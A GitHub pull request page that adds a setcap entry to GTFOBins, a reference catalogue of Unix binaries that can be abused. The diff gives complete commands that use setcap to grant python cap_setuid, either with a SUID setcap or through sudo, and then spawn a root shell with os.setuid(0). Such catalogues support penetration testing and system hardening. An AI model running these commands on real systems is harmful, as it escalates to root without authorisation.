Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Create setcap.md #457

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
15 changes: 15 additions & 0 deletions _gtfobins/setcap.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,15 @@
---
description: sets and removes capabilities on files
functions:
suid:
- description: Can be used to give and capabilities to other files. cap_setuid for example gives an executable permissions to switch uid.
code: |
cp $(which python) .
setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
sudo:
- code: |
cp $(which python) .
sudo setcap cap_setuid+ep python
./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
---